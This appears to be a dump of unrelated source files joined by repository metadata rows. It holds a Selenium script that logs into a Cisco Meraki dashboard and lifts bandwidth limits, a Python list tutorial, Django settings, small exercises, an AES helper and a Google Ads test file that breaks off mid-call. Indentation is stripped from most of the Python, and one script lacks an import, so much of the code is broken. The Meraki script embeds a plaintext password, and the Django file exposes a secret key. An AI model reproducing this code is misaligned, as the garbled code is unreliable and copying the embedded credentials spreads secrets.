import csv
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.action_chains import ActionChains
import time
LOGIN = "[email protected]"
PASSWORD = "Plussix@88"
LINK = "https://account.meraki.com/secure/login/dashboard_login"
# PLEASE, PUT YOUR PATH TO CHROMEDRIVER
PATH_TO_CHROMEDRIVER = "C:\\Users\\Nick\\Desktop\\Cisco-Meraki-Selenium-project-master\\chromedriver.exe"
# PLEASE, WRITE HERE FILE'S NAME
FILE = 'Network.csv'
# PLEASE, WRITE HERE PATH TO CSV FILE
PATH_TO_CSV_FILE = "C:\\Users\\Nick\\Desktop\\Cisco-Meraki-Selenium-project-master\\"
COLUMN_NAME = 'Network Name'  # header column name, used to skip the header row
ORGANIZATION = 'Boyd Hyperconverged Inc'
# TRACKS WHICH NETWORKS HAVE ALREADY BEEN PROCESSED
CHECK = {}
browser = webdriver.Chrome(executable_path=PATH_TO_CHROMEDRIVER)
with open(PATH_TO_CSV_FILE + FILE) as f:
    # READ ALL NETWORK NAMES FROM THE CSV INTO THE DICTIONARY
reader = csv.reader(f)
for row in reader:
if row[0] != COLUMN_NAME:
CHECK[row[0]] = ''
def take_network_from_csv():
global FILE
global PATH_TO_CSV_FILE
global COLUMN_NAME
global CHECK
global PATH_TO_CHROMEDRIVER
for i in CHECK:
if CHECK[i] != 'Done':
network_name = i
open_link(browser, network_name)
CHECK[network_name] = 'Done'
else:
continue
def open_link(browser, network_name):
    # MAIN WORKFLOW: LOG IN, OPEN THE NETWORK, AND REMOVE BANDWIDTH LIMITS
global LINK
global LOGIN
global PASSWORD
browser.get(LINK)
#LOG IN
email = browser.find_element_by_id('email')
password = browser.find_element_by_id('password')
email.send_keys(LOGIN)
password.send_keys(PASSWORD)
submit_button = browser.find_element_by_id('commit')
submit_button.click()
    # CHOOSE THE NEEDED ORGANIZATION (USE THE CONSTANT DEFINED ABOVE)
    organization = browser.find_element_by_link_text(ORGANIZATION)
organization.click()
#WAITING FOR PAGE LOADING
time.sleep(3)
# FIND AND CHOOSE NEEDED NETWORK
select_arrow_zone = browser.find_element_by_class_name('Select-arrow-zone')
select_arrow_zone.click()
input_network = browser.find_element_by_xpath('//*[@id="react-select-2--value"]/div[2]/input')
input_network.send_keys(network_name)
input_network.send_keys(Keys.ENTER)
#GOING TO Firewall & traffic shaping
tables = browser.find_elements_by_class_name('menu-item-container')
for i in tables:
if i.text == 'Wireless':
needed_table = i
needed_table.click()
time.sleep(3)
organization = browser.find_elements_by_tag_name('a')
for i in organization:
if i.text == 'Firewall & traffic shaping' or i.text == 'Firewall':
firewall = i
firewall.click()
    # DRAG THE PER-CLIENT AND PER-SSID BANDWIDTH SLIDERS TO 'UNLIMITED'
client_slider = browser.find_elements_by_class_name('simple')
if client_slider[0].text != 'unlimited':
source_element = browser.find_element_by_xpath('//*[@id="per_client_limit"]/table/tbody/tr/td[1]/div/div[2]/a')
dest_element = browser.find_element_by_class_name('bandwidth_widget_toggle')
ActionChains(browser).drag_and_drop(source_element, dest_element).perform()
if client_slider[1].text != 'unlimited':
source_element = browser.find_element_by_xpath('//*[@id="per_ssid_limit"]/table/tbody/tr/td[1]/div/div[2]/a')
dest_element = browser.find_element_by_class_name('bandwidth_widget_toggle')
ActionChains(browser).drag_and_drop(source_element, dest_element).perform()
time.sleep(5)
# SAVING
try:
save_changes = browser.find_element_by_id('floating_submit')
save_changes.click()
except:
print('Already Unlimited')
browser.quit()
if __name__ == '__main__':
while True:
try:
take_network_from_csv()
break
except:
browser.quit()
take_network_from_csv()
print('DONE')
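# Hedged improvement sketch (not wired into the flow above): explicit waits are
# usually more reliable than fixed time.sleep() pauses on the Meraki dashboard.
def wait_for_css(browser_, css_selector, timeout=15):
    from selenium.webdriver.common.by import By
    from selenium.webdriver.support.ui import WebDriverWait
    from selenium.webdriver.support import expected_conditions as EC
    return WebDriverWait(browser_, timeout).until(
        EC.presence_of_element_located((By.CSS_SELECTOR, css_selector)))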
| [
"[email protected]"
] | |
c6f6ba2d9b4e9d5fb450005f0c441d8158549d6f | 7f7239ca087141faf3706994a5209ed0c1f8c21f | /Python Crash Course/Chinese Version/第三章 列表简介.py | cbbafaf34e9db381a4208a1b71434e1ee83d6da6 | [] | no_license | xiemeigongzi88/Python_Beginners | f81bfaec6a3f607c18514d9c7c3d93271652cc8c | 72a85cbd132ecab2c0d607f06d5e21002628795f | refs/heads/master | 2021-07-01T14:39:43.346280 | 2020-10-30T17:52:47 | 2020-10-30T17:52:47 | 173,500,706 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,183 | py | 第三章 列表简介
Page 26 - 33
Page 26
3.1 列表是 什么?
列表:
由一系列按照 特定顺序排列的元素组成
其中元素之间可以没有任何关系
用 [] 来表示列表
bicycles=['trek','cannondale','redline','specialized']
print(bicycles)
OUT:
['trek', 'cannondale', 'redline', 'specialized']
3.1.1 Accessing Elements in a List
bicycles=['trek','cannondale','redline','specialized']
print(bicycles[0])
OUT:
trek
######################################
bicycles=['trek','cannondale','redline','specialized']
print(bicycles[0].title())
OUT:
Trek
########################################
bicycles=['trek','cannondale','redline','specialized']
print(bicycles[1])
print(bicycles[3])
print("###########")
print(bicycles[-1])
print(bicycles[-2])
print(bicycles[-3])
print(bicycles[-4])
OUT:
cannondale
specialized
###########
specialized
redline
cannondale
trek
3.1.3 Using Individual Values from a List
You can use concatenation to build a message from a value in a list.
bicycles=['trek','cannondale','redline','specialized']
message="My first bicycle was a "+bicycles[0].title()+"."
print(message)
OUT:
My first bicycle was a Trek.
###########################################
EXC 3-1
names=['Abel','Erica','Eric','Batholomew','Ana','Ada']
print(names)
for i in range(len(names)):
print(names[i])
OUT:
['Abel', 'Erica', 'Eric', 'Batholomew', 'Ana', 'Ada']
Abel
Erica
Eric
Batholomew
Ana
Ada
#######################################
EXC 3-2
names=['Abel','Erica','Eric','Batholomew','Ana','Ada']
print(names)
for i in range(len(names)):
print(names[i]+"\n Good Luck!")
################
EXC 3-3
Page 27
3.2 Modifying, Adding, and Removing Elements
Lists are dynamic: after a list is created, you can remove elements from it and add elements to it as the program runs.
3.2.1 Modifying Elements in a List
motor=['honda','yamaha','suzuki']
print(motor)
motor[2]='ducati'
print(motor)
OUT:
['honda', 'yamaha', 'suzuki']
['honda', 'yamaha', 'ducati']
motor[3]='scar'
IndexError: list assignment index out of range
## In other words, you can only modify elements that already exist in the list
3.2.2 Adding Elements to a List
1. Appending an element to the end of a list
motor=['honda','yamaha','suzuki']
print(motor)
motor.append('ducati')
print(motor)
OUT:
['honda', 'yamaha', 'suzuki']
['honda', 'yamaha', 'suzuki', 'ducati']
##################################
a=[]
print(a)
a.append(1)
a.append(2)
a.append(3)
a.append(4)
a.append(5)
a.append(6)
print(a)
OUT:
[]
[1, 2, 3, 4, 5, 6]
You often won't know what data users want to store until after the program is running.
2. Inserting an element into a list
The insert() method lets you add a new element at any position.
a=['honda','toyota','Benz','LandRover','nissa']
print(a)
a.insert(1,'civic')
print(a)
OUT:
['honda', 'toyota', 'Benz', 'LandRover', 'nissa']
['honda', 'civic', 'toyota', 'Benz', 'LandRover', 'nissa']
3.2.3 Removing Elements from a List
1. Removing an element with the del statement
a=['honda','toyota','Benz','LandRover','nissa']
print(a)
del a[4]
print(a)
OUT:
['honda', 'toyota', 'Benz', 'LandRover', 'nissa']
['honda', 'toyota', 'Benz', 'LandRover']
2. Removing an element with the pop() method
pop() removes an element from the list but lets you keep working with its value.
By default pop() removes the element at the end of the list.
a=['honda','toyota','Benz','LandRover','nissa']
print(a)
b=a.pop()
print(b)
print(a)
OUT:
['honda', 'toyota', 'Benz', 'LandRover', 'nissa']
nissa
['honda', 'toyota', 'Benz', 'LandRover']
##################################
a=['honda','toyota','Benz','LandRover','nissa']
b=a.pop()
print("The last motor I owned was a "+b.title()+".")
OUT:
The last motor I owned was a Nissa.
3. Popping an element from any position in a list
a=['honda','toyota','Benz','LandRover','nissa']
print(a)
b=a.pop(0)
print(b)
print(a)
OUT:
['honda', 'toyota', 'Benz', 'LandRover', 'nissa']
honda
['toyota', 'Benz', 'LandRover', 'nissa']
After you use pop(), the popped element is no longer in the list.
If you want to delete an element from a list and never use it in any way again, use the del statement;
if you want to keep using an element after removing it, use the pop() method.
4. Removing an element by value
When you don't know the position of the value you want to remove from the list,
use the remove() method.
a=['honda','toyota','Benz','LandRover','nissa']
print(a)
a.remove('Benz')
print(a)
OUT:
['honda', 'toyota', 'Benz', 'LandRover', 'nissa']
['honda', 'toyota', 'LandRover', 'nissa']
When you use remove() to delete an element from a list, you can also keep using its value.
a=['honda','toyota','benz','LandRover','nissa']
print(a)
b='benz'
a.remove(b)
print(a)
print("\nA "+b.title()+" is too expensive for me.")
OUT:
['honda', 'toyota', 'benz', 'LandRover', 'nissa']
['honda', 'toyota', 'LandRover', 'nissa']
A Benz is too expensive for me.
Note:
The remove() method deletes only the first occurrence of the specified value. If the value may appear more than once in the list, you need a loop to make sure every occurrence is removed.
remove() deletes an element by its content;
pop() deletes an element by its position.
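For example, a while loop keeps calling remove() until no occurrence is left:
pets=['cat','dog','cat','fish','cat']
while 'cat' in pets:
    pets.remove('cat')
print(pets)
OUT:
['dog', 'fish']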
Page 30
3.3 Organizing a List
3.3.1 Sorting a list permanently with the sort() method
The change to the order of the list's elements is permanent.
cars=['bmw','audi','toyota','subaru']
print(cars)
cars.sort()
print(cars)
OUT:
['bmw', 'audi', 'toyota', 'subaru']
['audi', 'bmw', 'subaru', 'toyota']
# The element order has been changed permanently; the original order can no longer be recovered
You can also sort the list elements in reverse alphabetical order.
cars=['bmw','audi','toyota','subaru']
print(cars)
cars.sort()
print(cars)
cars.sort(reverse=True)
print(cars)
OUT:
['bmw', 'audi', 'toyota', 'subaru']
['audi', 'bmw', 'subaru', 'toyota']
['toyota', 'subaru', 'bmw', 'audi']
3.3.2 Sorting a list temporarily with the sorted() function
To preserve the original order of a list's elements while still presenting them in a particular order, use the sorted() function.
sorted() displays the list elements in a particular order without affecting their original order in the list.
cars=['bmw','audi','toyota','subaru']
print("here is the original list:")
print(cars)
print("\nhere is the sorted list:")
print(sorted(cars))
print("\nhere is the original list again:")
print(cars)
OUT:
here is the original list:
['bmw', 'audi', 'toyota', 'subaru']
here is the sorted list:
['audi', 'bmw', 'subaru', 'toyota']
here is the original list again:
['bmw', 'audi', 'toyota', 'subaru']
After the call to sorted(), the order of the elements in the list itself has not changed.
print("\nhere is the reverse sorted list:")
print(sorted(cars,reverse=True))
OUT:
here is the reverse sorted list:
['toyota', 'subaru', 'bmw', 'audi']
3.3.3 Printing a list in reverse order
To reverse the order of a list's elements, use reverse().
cars=['bmw','audi','toyota','subaru']
print(cars)
cars.reverse()
print(cars)
OUT:
['bmw', 'audi', 'toyota', 'subaru']
['subaru', 'toyota', 'audi', 'bmw']
## Note:
The reverse() method changes the order of the list elements permanently, but you can restore the original order at any time simply by calling reverse() on the list again.
3.3.4 Finding the length of a list
len()
>>> cars=['bmw','audi','toyota','subaru']
>>> len(cars)
4
Page 32
3.4 Avoiding Index Errors When Working with Lists
cars=['bmw','audi','toyota','subaru']
print(cars[4])
OUT:
IndexError: list index out of range
####################################
cars=['bmw','audi','toyota','subaru']
print(cars[-1])
a=[]
print(a[-1])
OUT:
subaru
File "C:/Users/sxw17/PycharmProjects/myPro_obj/mypy_01.py", line 6, in <module>
print(a[-1])
IndexError: list index out of range
# Note:
An index error on [-1] occurs only when the list is empty, i.e. contains no elements.
| [
"[email protected]"
] | |
37a024c9f7fb0d090e1597c0898fc90ded145af4 | bf02d02dad536f48dff434aae2b737d58d9ef216 | /mysite/mysite/settings.py | 57fbd51bd69a684e35624379b4a2f0ff6f672a68 | [] | no_license | myselfsai/project1 | f59d090829782f46770a0d360a9f88928a8f720f | ac74079040beb2dd74dbefe7c2faba01126355b7 | refs/heads/master | 2021-01-15T12:02:12.123298 | 2020-01-24T05:13:28 | 2020-01-24T05:13:28 | 99,643,762 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,126 | py | """
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 1.11.4.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'fip#j!(h_g(6=en_4@^y%y=x!d2pp+@exd3fr$ve_n20-mjggp'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'polls.apps.PollsConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
| [
"[email protected]"
] | |
bfcab4cecd2a7d8e3946cf55d03659e839d25b3d | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/82/usersdata/165/44623/submittedfiles/decimal2bin.py | b07134dde6b2df7bd468626e44d12cc75e301ed4 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 153 | py | # -*- coding: utf-8 -*-
n=int(input('digite n:'))
i=0
soma=0
while n>0:
resto=n%10
soma=soma+resto*(2**i)
n=n//10
i=i+1
print(soma)
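# Counterpart sketch (not part of the original exercise): the reverse
# conversion, decimal -> binary digits, in the same digit-by-digit style.
def dec2bin(n):
    digits = ''
    while n > 0:
        digits = str(n % 2) + digits
        n = n // 2
    return digits or '0'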
| [
"[email protected]"
] | |
2406f8d30bec4dab92a9975052e0714bba593eaf | 986853c69a9dfc13ca5303f7e56db028f114a744 | /fiboncci series.py | 22ec2d5e8c79f99d8c5335d34f7f44ed266123e6 | [] | no_license | omee1/Python | 78320d04f48eab1a9b929fca92813be36e33a302 | ba94ecbb0afd2f99b70e3bfd2b4837d0d4fce354 | refs/heads/master | 2023-08-18T17:01:29.977259 | 2021-10-21T09:22:13 | 2021-10-21T09:22:13 | 419,625,589 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 203 | py | def series(n):
a=0
b=1
count=0
while count<n:
print(a,end=",")
c=a+b
a=b
b=c
count +=1
num=int(input("enter the no"))
print(series(num)) | [
"[email protected]"
] | |
79f62a7ee6eb1f0d6df192c475af8fec47ca39a9 | ea5af064f6583c4dc244627f67bf51a9119347a9 | /crypto.py | 4c6a27ad97768b78070c68886cdd9f351d4f73f8 | [] | no_license | celiyan/PyPassManager | 034c10cfe594d365822dc836e0f0143e02ac25e3 | fda994b44b7a003825e16bbcaffd07cf094e04b7 | refs/heads/master | 2022-12-19T19:51:29.714559 | 2020-10-15T05:16:37 | 2020-10-15T05:16:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,530 | py | from Crypto.Cipher import AES
from os import urandom
def pad(txt):
"AES CBC requires the number of plaintext bytes to be a multiple of 16, so we pad it to the nearest multiple. Takes&Returns bytes object."
padding_length = AES.block_size - len(txt)%AES.block_size
# we pad with a character = to the padding length, to make unpadding easy
padding = chr(padding_length) * padding_length
return txt+padding.encode()
def unpad(txt):
"To get just the encrypted data back, we need to undo any meaningless padding we added to satisfy length requirements. Takes&Returns bytes object."
padding_length = txt[-1] # length is stored as the character code of the padding
return txt[:-padding_length]
def encrypt(raw, key):
"Encrypt bytes using AES CBC, and a random InitialVector that is stored at the start. Inputs two bytes objects: plaintext & key. Returns ciphertext as bytes object."
iv = urandom(AES.block_size)
key = key[:32] # key must be 32 bytes, masterpass hash is 64 bytes
cipher = AES.new(key, AES.MODE_CBC, iv)
return iv+cipher.encrypt(pad(raw)) # store iv so it can be decoded
def decrypt(data, key):
"Decrypt bytes using AES CBC, extracting the InitialVector from the start. Inputs two bytes objects: ciphertext & key. Returns plaintext as bytes object."
iv, data = data[:AES.block_size], data[AES.block_size:] # extract the iv from the start
key = key[:32] # key must be 32 bytes, masterpass hash is 64 bytes
cipher = AES.new(key, AES.MODE_CBC, iv)
    return unpad(cipher.decrypt(data))
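if __name__ == "__main__":
    # Hedged usage sketch (not part of the original module): derive the 64-byte
    # master-pass hash the comments describe and round-trip a message.
    import hashlib
    key = hashlib.sha512(b"hypothetical master password").digest()
    token = encrypt(b"secret note", key)
    assert decrypt(token, key) == b"secret note"
| [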
"[email protected]"
] | |
9feacf0a85e2b4cb750a3f12f786d8971b96efc5 | 54f352a242a8ad6ff5516703e91da61e08d9a9e6 | /Source Codes/AtCoder/arc042/B/4081354.py | 8eea907c466a07c6b45bfcd05fcae80479294c1a | [] | no_license | Kawser-nerd/CLCDSA | 5cbd8a4c3f65173e4e8e0d7ed845574c4770c3eb | aee32551795763b54acb26856ab239370cac4e75 | refs/heads/master | 2022-02-09T11:08:56.588303 | 2022-01-26T18:53:40 | 2022-01-26T18:53:40 | 211,783,197 | 23 | 9 | null | null | null | null | UTF-8 | Python | false | false | 250 | py | #!/usr/bin/env python3
p = complex(*list(map(int, input().split())))
N = int(input())
li = [complex(*list(map(int, input().split()))) for _ in range(N)]
li += [li[0]]  # close the polygon so zip(li, li[1:]) walks every edge
# ((p - a) / (b - a)).imag is the perpendicular offset of p from the edge
# a -> b measured in units of |b - a|; multiplying by abs(b - a) restores the
# true signed distance, so the minimum over all edges is the answer.
m = min(((p - a) / (b - a)).imag * abs(b - a) for a, b in zip(li, li[1:]))
print(m) | [
"[email protected]"
] | |
cb4ed431777e8b10a7599b169d74a3f947751042 | c16ea32a4cddb6b63ad3bacce3c6db0259d2bacd | /google/ads/googleads/v5/googleads-py/tests/unit/gapic/googleads.v5/services/test_ad_service.py | 8c1b9a30e2d2d599c646bfa72dbe5b188716250f | [
"Apache-2.0"
] | permissive | dizcology/googleapis-gen | 74a72b655fba2565233e5a289cfaea6dc7b91e1a | 478f36572d7bcf1dc66038d0e76b9b3fa2abae63 | refs/heads/master | 2023-06-04T15:51:18.380826 | 2021-06-16T20:42:38 | 2021-06-16T20:42:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 34,485 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
from unittest import mock
import grpc
import math
import pytest
from proto.marshal.rules.dates import DurationRule, TimestampRule
from google.ads.googleads.v5.common.types import ad_asset
from google.ads.googleads.v5.common.types import ad_type_infos
from google.ads.googleads.v5.common.types import custom_parameter
from google.ads.googleads.v5.common.types import final_app_url
from google.ads.googleads.v5.common.types import url_collection
from google.ads.googleads.v5.enums.types import ad_type
from google.ads.googleads.v5.enums.types import app_url_operating_system_type
from google.ads.googleads.v5.enums.types import call_conversion_reporting_state
from google.ads.googleads.v5.enums.types import device
from google.ads.googleads.v5.enums.types import display_ad_format_setting
from google.ads.googleads.v5.enums.types import display_upload_product_type
from google.ads.googleads.v5.enums.types import legacy_app_install_ad_app_store
from google.ads.googleads.v5.enums.types import mime_type
from google.ads.googleads.v5.enums.types import response_content_type
from google.ads.googleads.v5.enums.types import served_asset_field_type
from google.ads.googleads.v5.enums.types import system_managed_entity_source
from google.ads.googleads.v5.resources.types import ad
from google.ads.googleads.v5.services.services.ad_service import AdServiceClient
from google.ads.googleads.v5.services.services.ad_service import transports
from google.ads.googleads.v5.services.types import ad_service
from google.api_core import client_options
from google.api_core import gapic_v1
from google.api_core import grpc_helpers
from google.auth import credentials as ga_credentials
from google.auth.exceptions import MutualTLSChannelError
from google.oauth2 import service_account
from google.protobuf import field_mask_pb2 # type: ignore
import google.auth
def client_cert_source_callback():
return b"cert bytes", b"key bytes"
# If default endpoint is localhost, then default mtls endpoint will be the same.
# This method modifies the default endpoint so the client can produce a different
# mtls endpoint for endpoint testing purposes.
def modify_default_endpoint(client):
return "foo.googleapis.com" if ("localhost" in client.DEFAULT_ENDPOINT) else client.DEFAULT_ENDPOINT
def test__get_default_mtls_endpoint():
api_endpoint = "example.googleapis.com"
api_mtls_endpoint = "example.mtls.googleapis.com"
sandbox_endpoint = "example.sandbox.googleapis.com"
sandbox_mtls_endpoint = "example.mtls.sandbox.googleapis.com"
non_googleapi = "api.example.com"
assert AdServiceClient._get_default_mtls_endpoint(None) is None
assert AdServiceClient._get_default_mtls_endpoint(api_endpoint) == api_mtls_endpoint
assert AdServiceClient._get_default_mtls_endpoint(api_mtls_endpoint) == api_mtls_endpoint
assert AdServiceClient._get_default_mtls_endpoint(sandbox_endpoint) == sandbox_mtls_endpoint
assert AdServiceClient._get_default_mtls_endpoint(sandbox_mtls_endpoint) == sandbox_mtls_endpoint
assert AdServiceClient._get_default_mtls_endpoint(non_googleapi) == non_googleapi
def test_ad_service_client_from_service_account_info():
creds = ga_credentials.AnonymousCredentials()
with mock.patch.object(service_account.Credentials, 'from_service_account_info') as factory:
factory.return_value = creds
info = {"valid": True}
client = AdServiceClient.from_service_account_info(info)
assert client.transport._credentials == creds
assert client.transport._host == 'googleads.googleapis.com:443'
def test_ad_service_client_from_service_account_file():
creds = ga_credentials.AnonymousCredentials()
with mock.patch.object(service_account.Credentials, 'from_service_account_file') as factory:
factory.return_value = creds
client = AdServiceClient.from_service_account_file("dummy/file/path.json")
assert client.transport._credentials == creds
client = AdServiceClient.from_service_account_json("dummy/file/path.json")
assert client.transport._credentials == creds
assert client.transport._host == 'googleads.googleapis.com:443'
def test_ad_service_client_get_transport_class():
transport = AdServiceClient.get_transport_class()
assert transport == transports.AdServiceGrpcTransport
transport = AdServiceClient.get_transport_class("grpc")
assert transport == transports.AdServiceGrpcTransport
@mock.patch.object(AdServiceClient, "DEFAULT_ENDPOINT", modify_default_endpoint(AdServiceClient))
def test_ad_service_client_client_options():
# Check that if channel is provided we won't create a new one.
with mock.patch('google.ads.googleads.v5.services.services.ad_service.AdServiceClient.get_transport_class') as gtc:
transport = transports.AdServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials()
)
client = AdServiceClient(transport=transport)
gtc.assert_not_called()
# Check that if channel is provided via str we will create a new one.
with mock.patch('google.ads.googleads.v5.services.services.ad_service.AdServiceClient.get_transport_class') as gtc:
client = AdServiceClient(transport="grpc")
gtc.assert_called()
# Check the case api_endpoint is provided.
options = client_options.ClientOptions(api_endpoint="squid.clam.whelk")
with mock.patch('google.ads.googleads.v5.services.services.ad_service.transports.AdServiceGrpcTransport.__init__') as grpc_transport:
grpc_transport.return_value = None
client = AdServiceClient(client_options=options)
grpc_transport.assert_called_once_with(
ssl_channel_credentials=None,
credentials=None,
host="squid.clam.whelk",
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT
# is "never".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "never"}):
with mock.patch('google.ads.googleads.v5.services.services.ad_service.transports.AdServiceGrpcTransport.__init__') as grpc_transport:
grpc_transport.return_value = None
client = AdServiceClient()
grpc_transport.assert_called_once_with(
ssl_channel_credentials=None,
credentials=None,
host=client.DEFAULT_ENDPOINT,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT is
# "always".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "always"}):
with mock.patch('google.ads.googleads.v5.services.services.ad_service.transports.AdServiceGrpcTransport.__init__') as grpc_transport:
grpc_transport.return_value = None
client = AdServiceClient()
grpc_transport.assert_called_once_with(
ssl_channel_credentials=None,
credentials=None,
host=client.DEFAULT_MTLS_ENDPOINT,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT has
# unsupported value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "Unsupported"}):
with pytest.raises(MutualTLSChannelError):
client = AdServiceClient()
# Check the case GOOGLE_API_USE_CLIENT_CERTIFICATE has unsupported value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "Unsupported"}):
with pytest.raises(ValueError):
client = AdServiceClient()
@mock.patch.object(AdServiceClient, "DEFAULT_ENDPOINT", modify_default_endpoint(AdServiceClient))
@mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "auto"})
@pytest.mark.parametrize("use_client_cert_env", ["true", "false"])
def test_ad_service_client_mtls_env_auto(use_client_cert_env):
# This tests the endpoint autoswitch behavior. Endpoint is autoswitched to the default
# mtls endpoint, if GOOGLE_API_USE_CLIENT_CERTIFICATE is "true" and client cert exists.
# Check the case client_cert_source is provided. Whether client cert is used depends on
# GOOGLE_API_USE_CLIENT_CERTIFICATE value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}):
options = client_options.ClientOptions(client_cert_source=client_cert_source_callback)
with mock.patch('google.ads.googleads.v5.services.services.ad_service.transports.AdServiceGrpcTransport.__init__') as grpc_transport:
ssl_channel_creds = mock.Mock()
with mock.patch('grpc.ssl_channel_credentials', return_value=ssl_channel_creds):
grpc_transport.return_value = None
client = AdServiceClient(client_options=options)
if use_client_cert_env == "false":
expected_ssl_channel_creds = None
expected_host = client.DEFAULT_ENDPOINT
else:
expected_ssl_channel_creds = ssl_channel_creds
expected_host = client.DEFAULT_MTLS_ENDPOINT
grpc_transport.assert_called_once_with(
ssl_channel_credentials=expected_ssl_channel_creds,
credentials=None,
host=expected_host,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case ADC client cert is provided. Whether client cert is used depends on
# GOOGLE_API_USE_CLIENT_CERTIFICATE value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}):
with mock.patch('google.ads.googleads.v5.services.services.ad_service.transports.AdServiceGrpcTransport.__init__') as grpc_transport:
with mock.patch('google.auth.transport.grpc.SslCredentials.__init__', return_value=None):
with mock.patch('google.auth.transport.grpc.SslCredentials.is_mtls', new_callable=mock.PropertyMock) as is_mtls_mock:
with mock.patch('google.auth.transport.grpc.SslCredentials.ssl_credentials', new_callable=mock.PropertyMock) as ssl_credentials_mock:
if use_client_cert_env == "false":
is_mtls_mock.return_value = False
ssl_credentials_mock.return_value = None
expected_host = client.DEFAULT_ENDPOINT
expected_ssl_channel_creds = None
else:
is_mtls_mock.return_value = True
ssl_credentials_mock.return_value = mock.Mock()
expected_host = client.DEFAULT_MTLS_ENDPOINT
expected_ssl_channel_creds = ssl_credentials_mock.return_value
grpc_transport.return_value = None
client = AdServiceClient()
grpc_transport.assert_called_once_with(
ssl_channel_credentials=expected_ssl_channel_creds,
credentials=None,
host=expected_host,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case client_cert_source and ADC client cert are not provided.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}):
with mock.patch('google.ads.googleads.v5.services.services.ad_service.transports.AdServiceGrpcTransport.__init__') as grpc_transport:
with mock.patch('google.auth.transport.grpc.SslCredentials.__init__', return_value=None):
with mock.patch('google.auth.transport.grpc.SslCredentials.is_mtls', new_callable=mock.PropertyMock) as is_mtls_mock:
is_mtls_mock.return_value = False
grpc_transport.return_value = None
client = AdServiceClient()
grpc_transport.assert_called_once_with(
